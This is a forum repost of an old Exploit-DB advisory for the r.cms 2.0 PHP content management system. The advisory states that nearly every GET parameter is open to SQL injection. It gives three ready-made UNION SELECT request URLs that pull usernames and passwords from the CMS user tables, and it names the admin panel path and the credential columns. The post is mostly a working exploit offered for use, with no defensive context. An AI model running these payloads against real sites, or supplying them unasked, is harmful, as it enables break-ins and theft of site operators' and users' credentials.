Exploit r.cms 2.0 - Multiple SQL Injections

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7502
Проверка EDB
  1. Пройдено
Автор
LIDLOSES_AUGE
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2008-12-17
Код:
###############################################################
#
#           r.cms V2 - Multiple SQL Injection Vulnerabilities 
#                                                             
#      Vulnerability discovered by: Lidloses_Auge             
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
#                                   Palme, GPM, Free-Hack
#      Date:                        16.12.2008
#
###############################################################
#                                                             
#      Admin Panel: [Target]/rcms/
#      Description: Almost every GET parameter is vulnerable
#      				to SQL Injection, so i won't list 'em all.
#					There are two possible tables which contain
#					user data, depending on the CMS version.
#					Table:
#						rcmsv2
#					or:
#						rcms
#
#					The Columns for username and password are:
#						username
#						userpassword
#                                                             
###############################################################

http://xxx/index.php?id=1+union+select+1,2,3,4,5,concat(username,0x3a,userpassword),7,8,9+from+rcmsv2_user/*
http://xxx/referenzdetail.php?id=-6+union+select+1,2,3,4,5,6,concat(username,0x3a,userpassword),8,9,10,11+from+rcms_user/*
http://xxx/produkte.php?id=-2+union+select+1,2,3,4,5,6,7,8,concat(username,0x3a,userpassword),10,11+from+rcmsv2_user/*

# milw0rm.com [2008-12-17]
 
Источник
www.exploit-db.com

Похожие темы